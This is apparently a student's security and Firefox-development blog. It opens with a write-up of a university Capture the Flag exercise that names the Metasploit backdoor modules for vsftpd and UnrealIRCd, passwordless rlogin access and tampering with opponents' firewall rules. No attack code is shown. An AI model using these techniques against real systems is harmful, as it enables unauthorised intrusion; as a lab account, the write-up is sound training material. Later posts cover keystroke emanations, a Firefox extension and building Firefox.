Capture The Flag in Royal Holloway


On Monday 25th of March took place a Capture the Flag (CTF) competition in Royal Holloway as part of the Security Testing course. Due to the Spring break the participation was limited to 10 people, but whoever was interested was free to participate remotely. Hopefully, we were able to form three teams of four people each and shared the laboratory space. Two of my teammates were going to participate remotely which initially was thought as a drawback.

At first the professor described the rules and restrictions of the game as well as the pointing system that would be used.

The Scenario

Each team was owning a BackTrack and a Server machine. The Server was a modified Metasploitable, which was easy to figure out from some known vulnerable applications like tikiwiki. Moreover, we had to decide a secret phrase and a big secret phrase (the flags) that were placed somewhere in our systems from the operator of the event. The teams were allowed to attack each other in order to gain access to the opponents’ servers using all the appropriate means, but there were some restrictions regarding the defending techniques, where no denial of services and no system reboots where allowed.

As for the pointing system, we earned:

  • 1 point for each leaked password
  • 3 points for each secret phrase
  • 5 points for each big secret phrase

In addition, the respective points where reduced from the team that its passwords, secret and big secret phrases, were revealed.

Obviously, the aim of the CTF was to collect the highest number of points! In order to achieve our purpose we planned to attack as soon as possible, while we were trying to strengthen our defence. In the rest of the post I’m going to refer to the efforts of our team.

The Game

Before the CTF event, we were thinking that we will be given enough time to prepare our Server in order to reduce vulnerabilities (exploitable applications and misconfigurations). However, our assumptions were dropped and we began to attack and defend simultaneously. First of all, we retrieved the running processes on our machine in order to point out the vulnerable ones and fix them. At the same time, a scan on the network for the opponents’ machines was conducted, trying to figure out the versions of the running applications in order to search for any available exploits.

Each Server had a number of users (e.g ftp, service) and there was also a special user (our was ‘daisy’) with a probably weak password, vulnerable to brute force attack. Our first priority was to change these passwords to stronger ones. The first attack was performed at the vsftpd (Very Secure FTPD) application using an exploit from Metasploit (vsftpd_234_backdoor), which returned a shell with root privileges. Then, it was easy to retrieve the secrets and big secrets of the rest of the teams, gaining our first points and leading the scoreboard.

In the meantime, we were trying to find a solution in order to avoid any possible attack to our machine using the same exploit by setting an option in the configuration file covering this hole.

Unfortunately, the Servers allowed the connection with rlogin and any user (even root) without the use of password. By the time we fixed this issue (by removing .rhosts file from users folders in order to ask for a password), our system was already compromised (the netstat results of TCP connections where on fire!). From then on, each team was able to acquire each others secrets, so after an 1.30 hour we were all even.

One of the teams tried to block access using iptables, an incident that was reported, so they lost some points. Their action gave us the idea to modify the other Servers’ iptables by adding entries that allowed access to their systems only from our machines (BackTrack and Server)! For a while, they where confused so we had enough time to prepare our system and our next attack. Another vulnerability was found to the IRC process (running on port 6667), which was also exploitable using Metasploit (unreal_ircd_3281_backdoor), gaining root access to the other teams’ Servers. Although, we knew the vulnerabilities, we were not able to fix some of them (like the irc).

After the break the operator of the event asked for new big secrets and placed them into our machines. Subsequently, all the systems were again compromised and the big secrets were revealed. Nevertheless, we were trying to find new weaknesses in case we gained some points for our variety of attacks. Some of the members of the team were trying to exploit a NFS misconfiguration which allows to mount shared folders from other servers, when the professor announced that the winner will be whoever unzips first a locked zipped file placed in a certain location. Using hints that were located in the same folder, the purpose was to find the unique users of each Server (like ‘daisy’) and type their initial letters in alphabetical order. The tricky part was to use capital letters instead of lowercase!

As we were the first team to unzip the file, we won the CTF!! Congratulations to my team members for our collaboration and efficiency and to our opponents for their competitiveness!! I would also like to thank our professor for organising the event.

The Experience 

Being my first CTF event ever, I was awaiting to participate and give my best in order to win. Despite the fact that the number of teams was limited to three teams, the level of pressure and competition was high enough, so we were able to test and extend our skills and learn which errors to avoid in the future. The ability to adjust effectively to current conditions and estimate the situation given restricted amount of time before acting was some of the valuable skills gained through this process. Moreover, it was important that we managed to overcome the communication difficulties we faced due to remote collaboration over Skype.

All in all, it was a great experience, we enjoyed with the rest of the team members as well as with our ‘opponents’ and I’m looking forward to more to come!!

Electromagnetic keylogger

A keylogger (keystroke logger) is the software or hardware used to capture the keystrokes on a computer keyboard. Fortunately, if we are aware enough it is difficult for someone to install such a software or device to our computers.

A software keylogger can be installed by accidentally or deliberate installing of software acquired from unknown source. On the other hand, the installation of a hardware keylogger requires the attacker to have physical access to our machine.

Some simple measures to avoid such attacks are:

  • Software keyloggers: It is wise not to install software that comes attached on mails from unknown senders
  • Hardware keyloggers: Be aware of your property and who has access to it.

Alright, if you apply such simple protection measures you are safe. #NOT

Keyboards contain electromagnetic parts which are emitting electromagnetic waves. What will happen if we can capture these waves and decode them in order to reveal the actual message typed?

The answer can be found at the following video where a real antenna is used to capture the electromagnetic emanations of keystrokes even being in another room!


I wonder what will happen in a few years from now where devices like the “Black Hole” from Prison Break that will capture all the transmitted traffic become available!

The paper for this work is available here and more info can be found at their site.

Well begun is half done.

The beginning is half of everything.
– Pythagoras

The main purpose of registering this blog was to post my progress during my participation at a P2PU (Peer to Peer University) course on Firefox extension development. From then on, I didn’t actually post any updated information.

At the same time I was conducting my undergraduate thesis on a similar subject. Hopefully, I graduated and I currently pursue my Master of Science on Information Security at the Royal Holloway, University of London!!

Lately, I decided to post almost everyday here and there something new and interesting that I come up with, in order to achieve one or more of the following:

1. improve my written English
2. keep diary of interesting and educational things for each day
3. help people solve everyday problems either computer related or not
4. exchange opinions

DISCLAIMER: As my academic background is Computer Science related and my current academic state offers me loads of new and interesting information, most of the subjects will be computer or information security related. However, that should not be taken as a rule of thumb.

Whenever you notice something not accurate, please feel free to send me a mail or leave a comment mentioning it. I would really appreciate your comments wherever they are for correction or for appraisal. :)

iClone – Functionality and Screenshots

As I had presented in my previous post, iClone is a project that tries to minimize the distance between the internet users and force them to collaborate with each other to have better searching results and become more effective. It’s like having a network neighborhood where users interact, share and get advance of previous knowledge.

I have made a progress during past months with the transfer of the idea of iClone from a standalone app, running only on Windows, to an a extension which is applicable at the most well-known and used web application which is no else than Mozilla Firefox web browser.

Firefox is one of the greatest open source projects with an enormous number of people being evolved trying to make the best out of it. Fortunately, the stuff that’s available online is adequate for a beginner with extension development and the help provided from the guys at the irc chat is valuable.

The purpose of this post is to present the basic functionality of the extension and some screenshots of a session.

At first, a user has to register in order to use our service so a register page is provided:

Registration pane

Then we log in at our system with the credentials we provided at the previous step and we can see the main sidebar page which consists of a Radar panel, where the user’s radar and other info appear and the Share url panel where a user can share a link and see its previously shared.

Main Radar Panel

The radar widget is provided by and is developed in HTML5. My own addition is the ability to have info (a tooltip appears) when the mouse is over a certain slice (onhover event). The active user is always placed at the center of the radar (zero point, 0). The biggest the slice of a user is, more of his navigation history is the same with the active user.

Through the tooltip, we can see how much time has passed since a user’s last navigation and the slice’s color escalation from light green to red represents that visually.

Main radar’s tooltip

When a user clicks on a slice of the radar then a second radar appears below the first one with info about the selected user and his neighborhood.

Second radar with tooltip

You can see the neighbors of any user and their shared urls as well. This ability is provided when you right-click on the second radar and select the “Shared urls” option (last five results appear in a list). Clicking on a given url from the list opens in a new tab which is auto-focused. Selecting the “Radar only” option from the same menu the “Shared urls” list disappears.

Second radar’s menu

Clicking on a given url from the list opens in a new tab which is auto-focused. Selecting the “Radar only” option from the same menu the “Shared urls” list disappears.

Neighbor’s shared urls

As for the second pane, the user is provided with the ability to share new urls which can be tagged to be more informative. He can also retrieve the last five bookmarked urls (currently manually with the “Get shared!” button).

Share url panel

That’s all for now. Find me at probably asking for questions or helping begginers.

iClone – project proposal

General idea

For a place that gathers millions of people the Web seems a pretty lonely place at times. It would be nice if we can extend browser’s functionality in order all users to interact each other sharing ideas, opinions and information that would make browsing experience more pleasant and productive.

We build on these observations and focus on enhancing the user browsing experience towards a process known as social navigation. Social navigation describes the process where a number of people that share interests searching goals decide to coordinate their efforts. This cooperation and the feeling that more and more users can get benefited from this action is that offer Web the opportunity to “get alive” and creates the concept of a place where all users can communicate (on a informative level). But the most important is that information will be accessible from every user on real time so to get advantage of it. In addition, a mean of communication between users that are on the same place simultaneously to share their experiences should be available.

For the purpose of our idea, we decided to extend one of the most well-known browsers, Mozilla Firefox, which is based on an open-source orientation and can reinforce the wide spread of our application.

System functionality

  • Extend Mozilla Firefox functionality offering means of connection, interaction, communication and sharing of information between users in a synchronous way.
  • Presentation of an intuitive user interface that is able to visualize awareness of others and their actions.

User scenario

Say that a searher tries to find information about computer games and submits queries on his favorite search engine about the subject. Each time he visits a web page that attracts his interest, is added on a set which constitute the user’s profile. This profile can be compared with others of users that are connected on the system and return as result the profiles that have more similarities each other. The system recognizes these users and represents them in understandable way (e.g. a radar) to the searcher so it can be clear simularity level. However, while the search interests alter there is a change on the simularity relationship among the users.

It is clear that the purpose of the system is to present a set of users that are close to the searcher’s interests and which can alter dynamically depending on their decisions through time. It’ll also offer the appropriate means of real time communication in order to take advantage of the direct interaction among the users.


The tools that the system should be offer on a primary base are:

  • Radar

A radar in the real world, that operates on an object x, scans a wide area, measures the distance of other object to x and presents these objects along with their distances from x on a display. In our case, objects are users and distance us a metric of user to user proximity.

iclone radar

The radar metaphor

  • Private chat
  • Chat  (domain based)
  • Sharing bookmarks

The project on which is based the above idea is iClone and is already implemented on a stand-alone application. You can have all the appropriate info about this on the paper at the end. Our purpose it to transfer the whole functionality of this stand-alone application on Firefox so not to stay trapped on the strict bounds of the primary implementation.

iClone stand-alone app


XPCOM, XPIDL, XPFE on Internet Explorer (IE)

We have recently discussed about the three parts of Mozilla Firefox which are extremely valuable for the browser’s functionality and it’s time to see what are the alternatives that other browsers such as Microsoft’s Internet Explorer and Google Chrome offer in order to compete Firefox’s XPCOM, XPIDL and XPFE. During my research I found fair to present a browser with a longer history than the newly entered in the browser scene “Chrome” and that’s no other from Internet Explorer.

Microsoft’ s Internet Explorer (commonly abbreviated in IE) is currently at his 9th beta version being released with great perspectives related to his speed and general functionality. But let’s see what happens at the inner section.

Mozilla’s XPCOM alternative

Component Object Model (COM) is a binary-interface standard for software componentry introduced by Microsoft in 1993. It is used to enable interprocess communication and dynamic object creation in a large range of programming languages. The main purpose of its use is implement objects which can be used in environments different from the one in which they were created. Although it doesn’t sypport full cross-platform functionality like XPCOM, it has also being used as standard at Apple’s Core Foundation 1.3. The advantage of COM is that you are able to reuse objects without knowning their implementation as it combines interfaces’ descriptions (IDL) which are separate from the implementation. Of course the uniqueness of this techique has been lost, cause Mozilla offers exactly the same ease of use with well-defined and readable interfaces (XPIDL).

So we can assume that Internet Explorer also uses a componentized architecture built with techologies like Firefox’s ones, but with the difference on building blocks. Here we have components with each one having its own Dynamic-link library (DLL – the major drawback of Microsoft’s software) and exposes a set o COM programming interfaces. Personally I find Firefox’s modularity more user-friendly (not to mention the open-source orientation).

What happens with the code structure?

A COM developer should have in mind that it’s all about components. You should create one, describe it with an interface (or multiple interfaces) on a programming language (e.g. C, C++, Delphi) and give the each interface a unique number to distinguish them.

An interface contains all the methods that a programmer needs to access a COM component. Each interface consists of a pointer to a virtual function table that contains a list of pointers to the functions that implement the functions declared in the interface, in the same order that they are declared in the interface.

And what about IDL?

COM has its own mechanism for handling interface files and compiling them into our known type libraries (binary metadata files). The purpose of type libraries is the same as XPCOM’s: maintain compatibility on a a binary level so the client code can find and use the library it needs without worrying about linking it. In order to complete this procedure irterfaces are being compiled using Microsoft’s Interface Definition Language (MIDL) compiler. MIDL on its own its an text-based interface description language which with some extension provide the required functionality.

Although, COM remains the soul of IE it has been extended with .NET Framework supporting web services and becoming more distributed (through WCF) and someone can sense the feeling of deprecation of COM. I can describe .NET as a union of XPCOM, XPIDL and XPFE offering plenty of languages to work with like ASP, C#, Jscript etc.

Little words about .NET Framework…

Microsoft .NET Framework is a software framework that manages execution of programs written specifically for the framework aiming to provide language interoperability with biding different languages (each language can utilize code written in other languages) with the restriction for the language to belong at the .NET supporting language set. Part of the .NET is a runtime environment known as the Common Language Runtime (CLR) which provides the appearance of an application virtual machine so that programmers needn’t to consider the capabilities of the specific CPU that will execute the program.

net clr operation

.NET CLR "duty"

But how COM interacts with .NET?

Here comes COM Interop, a component of .NET Common Language Runtime (CLR) that enables bidirectional object interaction between COM and .NET in order not to make any change to previous compontents and to have smooth fuctionality. The actions that take place behind the scene include registration of the COM object, creation of required type libraries and implementation of appropriate method calls. All in all, the whole process is a temporarely replace of .NET CLR with the actual COM component.

Future plans for .NET

The design of the .NET Framework allows it to theoretically be platform agnostic, and thus cross-platform compatible. That is, a program written to use the framework should run without change on any type of system for which the framework is implemented. While Microsoft has never implemented the full framework on any system except Microsoft Windows, the framework is engineered to be platform agnostic.

As we can consider from the above stuff (until the appearance of an amount of new open-minded implemented software) cross platformness is not supported for Internet Explorer so we can discuss on a subject of COM and IDL leaving outside XP. Refering to XPFE, the majority of tools for web developing included in XPFE framework are supported on IE (e.g. javascript, css, xml) but due to the closed sourced policy that restrict out-of-the-box operation on other OS’s, loses its cross platform character.

All in all, I have concluded that currently the main difference between the two browsers’ architecture is that on the one hand, IE offers language interoperability, but on the other hand Firefox extends that with offering cross-platformness and open-source software which is most important nowrdays where the needs for customization are becoming bigger and bigger.

Building Mozilla Firefox (from source)

Mozilla’s Firefox source is available through their site and you can get it via Mercurial, CVS or HTTP/FTP repositories. Some of the features that distinguish Firefox’s build from other applications is that is cross-platform like all the other Mozilla’s project, which means that you can build it on different platform. I choose Ubuntu (Lucid 10.04) Linux because of the ease of use it offers (and other open-source oriented reasons!). One site that you must have in mind is TinderBox in order to make sure that the product you are working with is currently compiling in your environment.

At first, I should mention some problems I encountered during my first contact with Firefox building. I got the code from the HTTP/FTP repository but I encountered a problem with the options on .mozconfig file. This file is important for passing all the appropriate parameters in order to compile source and you put it in your Home folder. In order for the Makefile to identify which application would you compile (in our case Firefox which is a browser) the option ac_add_options --enable-application=browser is needed. But with the previous source code everything got wrong. So, I decided to get the more updated source from Mercurial’s repositories and finally I got something working. After my first try that failed, the main problem was that I couldn’t figure out how to use more than one options in .mozconfig file. The error that I continuously get (till now) is: configure: warning: –enable-debug: invalid host type .

After removing all the options (using only the important in order the compile to complete) I got the following build:

mozilla firefox build

Mozilla Firefox successful build

The simple .mozconfig file that used is:

. $topsrcdir/browser/config/mozconfig
ac_add_options --enable-application=browser
mk_add_options AUTOCONF=autoconf2.13

Using in your mozconfig file option mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/obj-@CONFIG_GUESS@ each time you build source a new objdir folder is made where all the created code/files are being put.

firefox build code

Firefox's build source code

The act of using an objdir means that every file in your source tree will be turned into a Makefile in the objdir. The parent directories of the will be the same parent directories in objdir. So you can throw away this objdir and build source from scratch without the need to get another copy of source code.

What’s coming up next? Try to figure out the reason that I can’t use more option without conflicting each other.